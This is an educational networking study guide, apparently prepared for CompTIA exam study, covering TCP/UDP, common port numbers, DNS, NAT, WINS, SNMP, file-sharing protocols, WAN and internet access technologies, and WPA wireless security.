The Transmission Control Protocol (TCP) and the User Datagram Protocol (UDP) are used to transmit network data to and from server and client applications. The main difference between the two protocols is that TCP uses a connection-oriented transport, while UDP uses a connectionless type of communication. When the TCP protocol is used, a special connection is opened up between two network devices, and the channel remains open to transmit data until it is closed.
On the other hand, a UDP transmission does not make a proper connection and merely broadcasts its data to the specified network address without any verification of receipt. For certain types of applications and services, a TCP connection makes more sense, while other types are more efficiently provided by UDP communication. The advantage of TCP is that the transmission is much more reliable because it uses acknowledgement packets to ensure delivery. The advantage of UDP is that there is no connection, so it is much faster without all the checks and acknowledgements going on, but is also less reliable. In Table some common TCP/IP applications are shown with the type of protocol they use.
|FTP (File Transfer Protocol)||20, 21|
|SSH (Secure Shell)||22|
|SMTP (Simple Mail Transfer Protocol)||25|
|DNS (Domain Name Service)||53|
|TFTP (Trivial File Transfer Protocol)||69|
|HTTP (Hypertext Transfer Protocol)||80|
|POP3 (Post Office Protocol version 3)||110|
|NNTP (Network News Transport Protocol)||119|
|NTP (Network Time Protocol)||123|
|IMAP4 (Internet Message Access Protocol version 4)||143|
|HTTPS (Hypertext Transfer Protocol Secure)||443|
TCP/IP networks communicate with hosts using their IP addresses. It would be very difficult for someone to have to memorize the different IP addresses for the hosts they want to connect to on the network. A Domain Name Service (DNS) makes it easier to identify a host by a domain name. A domain name uses words rather than numbers to identify Internet hosts. Suppose you want to connect to the CompTIA Web site by using your Web browser. You would enter
In the address bar to go to the Comp TIA Web page. www.comptia.org would be a common name used for a numerical IP address. You could use 18.104.22.168 instead, but www.comptia.org is easier to remember. A DNS server translates these addresses. Your Web browser asks the TCP/IP protocol to ask the DNS server for the IP address of www.comptia.org. When the browser receives the address, it connects to the Web site. Remember that DNS stands for Domain Name System (or Domain Name Service) and that a DNS server translates domain names into their IP addresses.
NAT (Network Address Translation)
NAT translates one IP address to another. This can be a source address or a destination address. Two basic implementations of NAT can be used: static and dynamic
With static NAT, a manual translation is performed by an address translation device, translating one IP address to a different one. Typically, static NAT is used to translate destination IP addresses in packets as they come into your network, but you can translate source addresses also.
With static address translation, you need to build the translations manually. If you have 1000 devices, you need to create 1000 static entries in the address translation table, which is a lot of work. Typically, static translation is done for inside resources that outside people want to access. When inside users access outside resources, dynamic translation is typically used. In this situation, the global address assigned to the internal user isn’t that important, since outside devices don’t directly connect to your internal users—they just return traffic to them that the inside user requested.
ICS (Internet Connection Sharing)
ICS (Internet Connection Sharing) is a built-in feature of Windows 98 Second Edition, Windows 2000, Windows Me, and Windows Xp. ICS provides networked computers with the capability to share a single connection to the Internet. Multiple users can use ICS to gain access to the Internet through a single connection by using Dial-Up Networking or local networking.
WINS (Windows Internet Name Service)
While DNS resolves host names to IP addresses, WINS resolves NetBIOS names to IP addresses. Windows Internet Name Service provides a dynamic database of IP address to NetBIOS name resolution mappings. WINS, determines the IP address associated with a particular network computer. This is called name resolution. WINS supports network client and server computers running Windows. WINS uses a distributed database that is automatically updated with the names of computers currently available and the IP address assigned to each one. DNS is an alternative for name resolution suitable for network computers with fixed IP addresses.
SNMP (Simple Network Management Protocol)
Simple Network Management Protocol, is a TCP/IP protocol for monitoring networks and network components. SNMP uses small utility programs called agents to monitor behavior and traffic on the network, in order to gather statistical data. These agents can be loaded onto managed devices such as hubs, NIC's, servers, routers, and bridges. The gathered data is stored in a MIB (management information base). To collect the information in a usable form, a management program console polls these agents and downloads the information from their MIB's, which then can be displayed as graphs, charts and sent to a database program to be analyzed.
NFS (Network File System)
Network File System (NFS) is a distributed file system that allows users to access files and directories located on remote computers and treat those files and directories as if they were local.
Zeroconf (Zero configuration)
Zero Configuration Networking is a set of techniques that automatically create a usable IP network without configuration or special servers. This allows unknowledgeable users to connect computers, networked printers, and other items together and expect them to work automatically. Without Zeroconf or something similar, a knowledgeable user must either set up special servers, like DHCP and DNS, or set up each computer's network settings manualy.
Zeroconf currently solves three problems :
- Choose numeric network addresses for networked items
- Figure out which computer has a certain name
- Figure out where to get services, like printing.
SMB (Server Message Block)
A file-sharing protocol designed to allow networked computers to transparently access files that reside on remote systems over a variety of networks. The SMB protocol defines a series of commands that pass information between computers. SMB uses four message types: session control, file, printer, and message. It is mainly used by Microsoft Windows equipped computers. SMB works through a client-server approach, where a client makes specific requests and the server responds accordingly. One section of the SMB protocol is specifically for filesystem access, such that clients may make requests to a file server. The SMB protocol was optimised for local subnet usage, but one could use it to access different subnets across the Internet on which MS Windows file-and-print sharing exploits usually focus. Client computers may have their own hard disks, which are not publicly shared, yet also want access to the shared file systems and printers on the server, and it is for this primary purpose that SMB is best known and most heavily used.
AFP (Apple File Protocol)
The file sharing protocol used in an AppleTalk network. In order for non-Apple networks to access data in an AppleShare server, their protocols must translate into the AFP language. AFP versions 3.0 and greater rely exclusively on TCP/IP (port 548 or 427) for establishing communication, supporting AppleTalk only as a service discovery protocol. The AFP 2.x family supports both TCP/IP and AppleTalk for communication and service discovery.
LPD (Line Printer Daemon) and Samba)
LPD is the primary UNIX printing protocol used to submit jobs to the printer. The LPR component initiates commands such as "print waiting jobs," "receive job," and "send queue state," and the LPD component in the print server responds to them. The most common implementations of LPD are in the official BSD UNIX operating system and the LPRng project. The Common Unix Printing System (or CUPS), which is more common on modern Linux distributions, borrows heavily from LPD. Unix and Mac OS X Servers use the Open Source SAMBA to provide Windows users with Server Message Block (SMB) file sharing.
WAN (Wide Area Networks) technologies:
services provide a temporary connection across a phone circuit. In networking, these are typically used for backup of primary circuits and for temporary boosts of bandwidth.
dedicated circuit is a permanent connection between two sites in which the bandwidth is dedicated to that company’s use. These circuits are common when a variety of services, such as voice, video, and data, must traverse the connection and you are concerned about delay issues with the traffic and guaranteed bandwidth.
cell-switched services can provide the same features that dedicated circuits offer. Their advantage over dedicated circuits is that a single device can connect to multiple devices on the same interface. The downside of these services is that they are not available at all locations, they are difficult to set up and troubleshoot, and the equipment is expensive when compared to equipment used for dedicated circuits.
Packet-switched services are similar to cell-switched services. Whereas cell-switched services switch fixed-length packets called cells, packet-switched services switch variable-length packets. This feature makes them better suited for data services, but they can nonetheless provide some of the QoS features that cell-switched services provide. Packet switching offers more efficient use of a telecommunication provider's network bandwidth. With packet switching, the switching mechanisms on the network route each data packet from switch to switch individually over the network using the best-available path. Any one physical link in a packet-switched network can carry packets from many different senders and for many different destinations. Where as in a circuit switched connection, the bandwidth is dedicated to one sender and receiver only.
ISDN (Integrated Services Digital Network)
Integrated Services Digital Network adapters can be used to send voice, data, audio, or video over standard telephone cabling. ISDN adapters must be connected directly to a digital telephone network. ISDN adapters are not actually modems, since they neither modulate nor demodulate the digital ISDN signal. Like standard modems, ISDN adapters are available both as internal devices that connect directly to a computer's expansion bus and as external devices that connect to one of a computer's serial or parallel ports. ISDN can provide data throughput rates from 56 Kbps to 1.544 Mbps using a T1 service. ISDN hardware requires a NT (network termination) device, which converts network data signals into the signaling protocols used by ISDN. Some times, the NT interface is included, or integrated, with ISDN adapters and ISDN-compatible routers. In other cases, an NT device separate from the adapter or router must be implemented. ISDN works at the physical, data link, network, and transport layers of the OSI Model.
FDDI (Fiber Distributed Data Interface)
Fiber Distributed Data Interface, shares many of the same features as token ring, such as a token passing, and the continuous network loop configuration. But FDDI has better fault tolerance because of its use of a dual, counter-rotating ring that enables the ring to reconfigure itself in case of a link failure. FDDI also has higher transfer speeds, 100 Mbps for FDDI, compared to 4 - 16 Mbps for Token Ring. Unlike Token Ring, which uses a star topology, FDDI uses a physical ring. Each device in the ring attaches to the adjacent device using a two stranded fiber optic cable. Data travels in one direction on the outer strand and in the other direction on the inner strand. When all devices attached to the dual ring are functioning properly, data travels on only one ring. FDDI transmits data on the second ring only in the event of a link failure.
|Media||MAC Method||Signal Propagation Method||Speed||Topologies||Maximum Connections|
|Fiber-optic||Token passing||Forwarded from device to device (or port to port on a hub) in a closed loop||100 Mbps||Double ring Star||500 nodes|
T1 (T Carrier level 1)
A 1.544 Mbps point to point dedicated, digital circuit provided by the telephone companies. T1 lines are widely used for private networks as well as interconnections between an organizations LAN and the telco. A T1 line uses two pairs of wire one to transmit, and one to receive. and time division multiplexing (TDM) to interleave 24 64-Kbps voice or data channels. The standard T1 frame is 193 bits long, which holds 24 8-bit voice samples and one synchronization bit with 8,000 frames transmitted per second. T1 is not restricted to digital voice or to 64 Kbps data streams. Channels may be combined and the total 1.544 Mbps capacity can be broken up as required.
T3 (T Carrier level 3)
A T3 line is a super high-speed connection capable of transmitting data at a rate of 45 Mbps. A T3 line represents a bandwidth equal to about 672 regular voice-grade telephone lines, which is wide enough to transmit real time video, and very large databases over a busy network. A T3 line is typically installed as a major networking artery for large corporations, universities with high-volume network traffic and for the backbones of the major Internet service providers.
OCx (Optical Carrier)
Optical Carrier, designations are used to specify the speed of fiber optic networks that conforms to the SONET standard.
X.25 is a network layer protocol that runs across both synchronous and asynchronous physical circuits, providing a lot of flexibility for your connection options. X.25 was actually developed to run across unreliable medium. It provides error detection and correction, as well as flow control, at both the data link layer (by LAPB) and the network layer (by X.25). In this sense, it performs a function similar to what TCP, at the transport layer, provides for IP. Because of its overhead, X.25 is best delegated to asynchronous, unreliable connections. If you have a synchronous digital connection, another protocol, such as Frame Relay or ATM, is much more efficient. An X.25 network transmits data with a packet-switching protocol, bypassing noisy telephone lines. This protocol relies on an elaborate worldwide network of packet-forwarding nodes that can participate in delivering an X.25 packet to its designated address.
Internet access technologies:
xDSL (Digital Subscriber Line)
xDSL is a term referring to a variety of new Digital Subscriber Line technologies. Some of these varieties are asymmetric with different data rates in the downstream and upstream directions. Others are symmetric. Downstream speeds range from 384 Kbps (or "SDSL") to 1.5-8 Mbps (or "ADSL").
Asymmetric Digital Subscriber Line (ADSL)
A high-bandwidth digital transmission technology that uses existing phone lines and also allows voice transmissions over the same lines. Most of the traffic is transmitted downstream to the user, generally at rates of 512 Kbps to about 6 Mbps.
Broadband Cable (Cable modem)
Cable modems use a broadband connection to the Internet through cable television infrastructure. These modems use frequencies that do not interfere with television transmission.
POTS / PSTN
(Plain Old Telephone Service / Public Switched Telephone Network) POTS / PSTN use modem's, which is a device that makes it possible for computers to communicate over telephone lines. The word modem comes from Modulate and Demodulate. Because standard telephone lines use analog signals, and computers digital signals, a sending modem must modulate its digital signals into analog signals. The computers modem on the receiving end must then demodulate the analog signals into digital signals. Modems can be external, connected to the computers serial port by an RS-232 cable or internal in one of the computers expansion slots. Modems connect to the phone line using standard telephone RJ-11 connectors.
A wireless network consists of wireless NICs and access points. NICs come in different models including PC Card, ISA, PCI, etc. Access points act as wireless hubs to link multiple wireless NICs into a single subnet. Access points also have at least one fixed Ethernet port to allow the wireless network to be bridged to a traditional wired Ethernet network, such as the organization’s network infrastructure. Wireless and wired devices can coexist on the same network.
- WLAN (Wireless Local Area Network) A group of computers and associated devices that communicate with each other wirelessly.
- WPA (Wi-Fi Protected Access) A security protocol for wireless networks that builds on the basic foundations of WEP. It secures wireless data transmission by using a key similar to WEP, but the added strength of WPA is that the key changes dynamically. The changing key makes it much more difficult for a hacker to learn the key and gain access to the network.
- WPA2 (Wi-Fi Protected Access 2) WPA2 is the second generation of WPA security and provides a stronger encryption mechanism through Advanced Encryption Standard (AES), which is a requirement for some government users.
- WPA-Personal A version of WPA that uses long and constantly changing encryption keys to make them difficult to decode.
- WPA-Enterprise A version of WPA that uses the same dynamic keys as WPA-Personal and also requires each wireless device to be authorized according to a master list held in a special authentication server.